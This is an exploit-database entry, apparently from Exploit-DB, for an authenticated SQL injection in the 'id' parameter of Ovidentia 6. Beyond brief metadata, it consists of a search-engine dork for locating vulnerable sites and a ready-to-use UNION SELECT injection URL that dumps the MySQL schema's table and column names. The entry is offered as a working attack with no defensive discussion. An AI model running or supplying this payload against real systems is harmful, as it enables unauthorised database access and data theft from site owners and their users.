EXPLOITS

Ovidentia 6 - 'id' SQL injection (Authenticated)

Author: Felipe Prates Donato
type: webapps
platform: php
port: 
date_added: 2021-03-25  
date_updated: 2021-03-25  
verified: 0  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 49707.txt  

# Exploit Title: Ovidentia 6 - 'id' SQL injection (Authenticated)
# Exploit Author: Felipe Prates Donato (m4ud)
# Vendor Homepage: http://www.ovidentia.org
# Version: 6
# DORK : "Powered by Ovidentia"

http://Site/ovidentia/index.php?tg=delegat&idx=mem&id=1 UNION Select (select group_concat(TABLE_NAME,":",COLUMN_NAME,"\r\n") from information_Schema.COLUMNS where TABLE_SCHEMA = 'mysql'),2--